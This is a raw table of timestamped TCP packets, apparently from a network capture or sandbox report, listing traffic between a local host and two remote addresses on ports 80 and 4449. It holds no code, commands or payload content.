Dec 10, 2024 11:11:19.560165882 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.561105013 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.561151981 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.561178923 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.561389923 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.562273026 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.562320948 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.562333107 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.562370062 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.563402891 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.563469887 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.563507080 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.563554049 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.564587116 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.564629078 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.564692974 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.564732075 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.565764904 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.565819025 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.565903902 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.565951109 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.566967964 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.567023993 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.567034006 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.567074060 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.568058968 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.568109989 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.568186998 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.568236113 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.569236040 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.569281101 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.569351912 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.569394112 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.570378065 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.570456982 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:19.570472956 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.570506096 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.570544958 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.571675062 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.571733952 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.571762085 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.571851015 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.572679043 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.572792053 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.572798967 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.572834015 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.573852062 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.573903084 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.573986053 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.574040890 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.575048923 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.575089931 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.575195074 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.575237989 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.576189995 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.576245070 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.576325893 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.576370955 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.577330112 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.577384949 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.577439070 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.577502012 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.578572989 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.578603983 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.578608990 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.578665018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.579767942 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.579811096 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.579835892 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.579936028 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.580849886 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.580935001 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.580940008 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.581060886 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.581978083 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.582019091 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.582083941 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.582129955 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.583169937 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.583209038 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.583297968 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.583384991 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.584305048 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.584366083 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.584378958 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.584412098 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.585561037 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.585580111 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.585606098 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.585616112 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.586633921 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.586678028 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.586751938 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.586817980 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.587785959 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.587841988 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.587846994 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.587877035 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.588974953 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.589023113 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.589068890 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.589225054 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.590112925 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.590156078 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.590186119 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.590229034 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.591258049 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.591331959 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.591365099 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.591464996 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.592458963 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.592575073 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.592576981 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.592609882 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.593588114 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.593650103 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.593807936 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.593904018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.594805002 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.594852924 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.594885111 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.595078945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.595928907 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.595969915 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.596021891 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.596076965 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.597120047 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.597166061 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.597230911 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.597274065 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.598273993 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.598315954 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.598411083 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.598459005 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.599450111 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.599512100 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.599533081 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.599591970 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.600543022 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.600691080 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.600735903 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.601694107 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.601733923 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.601804972 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.601895094 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.602868080 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.602911949 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.602992058 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.603032112 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.604021072 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.604079962 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.604135036 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.604224920 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.605209112 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.605325937 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.605350018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.605357885 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.689857960 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:19.689930916 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:19.731992006 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.732059002 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.732080936 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.732161045 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.732542992 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.732600927 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.732631922 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.732721090 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.733807087 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.733851910 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.733881950 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.733926058 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.734848976 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.734895945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.741404057 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.741453886 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.741538048 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.741643906 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.742057085 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.742104053 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.742376089 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.742433071 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.743442059 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.743501902 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.743514061 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.743547916 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.744276047 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.744324923 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.744422913 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.744469881 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.745456934 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.745506048 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.745568037 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.745639086 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.746593952 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.746633053 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.746694088 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.746745110 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.747889042 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.747940063 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.748063087 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.748107910 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.749070883 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.749116898 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.749145985 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.749219894 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.750174046 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.750226021 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.750272989 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.750318050 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.751239061 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.751274109 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.751343012 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.751391888 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.752440929 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.752481937 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.752517939 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.752557993 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.753587008 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.753642082 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.753670931 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.753803968 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.754743099 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.754782915 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.754813910 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.754856110 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.755887985 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.755942106 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.756025076 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.756064892 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.757122993 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.757230997 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.757241964 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.757272005 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.758282900 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.758336067 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.758382082 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.758517027 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.759387970 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.759433985 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.759464979 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.759501934 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.760503054 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.760554075 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.760610104 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.760683060 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.761708021 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.761759043 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.761816978 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.761854887 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.762883902 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.762927055 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.762959957 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.763010025 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.764038086 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.764094114 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.764177084 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.764225006 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.765171051 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.765218019 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.765326977 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.765368938 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.766473055 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.766521931 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.766572952 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.766633987 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.767518044 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.767591000 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.767613888 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.767653942 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.768650055 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.768695116 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.768759966 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.768863916 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.769831896 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.769893885 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.769923925 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.769983053 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.770991087 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.771034002 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.771115065 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.771155119 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.772130013 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.772182941 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.772339106 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.772388935 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.773293972 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.773340940 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.773416996 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.773463964 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.774447918 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.774497032 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.774558067 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.774601936 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.775728941 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.775796890 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.775806904 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.775835037 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.776860952 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.776906013 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.776988029 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.777035952 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.777960062 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.778043985 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.778072119 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.778117895 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.779133081 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.779253006 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.779290915 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.780313015 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.780359030 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.780441999 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.780489922 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.781450033 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.781497002 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.781586885 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.781641006 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.782655954 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.782675028 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.782700062 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.782713890 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.783776999 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.783826113 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.783860922 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.783895969 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.784910917 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.784960985 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.785145998 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.785336018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.786107063 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.786160946 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.786215067 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.786309958 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.787297010 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.787343979 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.787350893 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.787403107 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.788398981 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.788464069 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:19.788511992 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:19.788554907 CET	49850	80	192.168.2.5	185.215.113.16
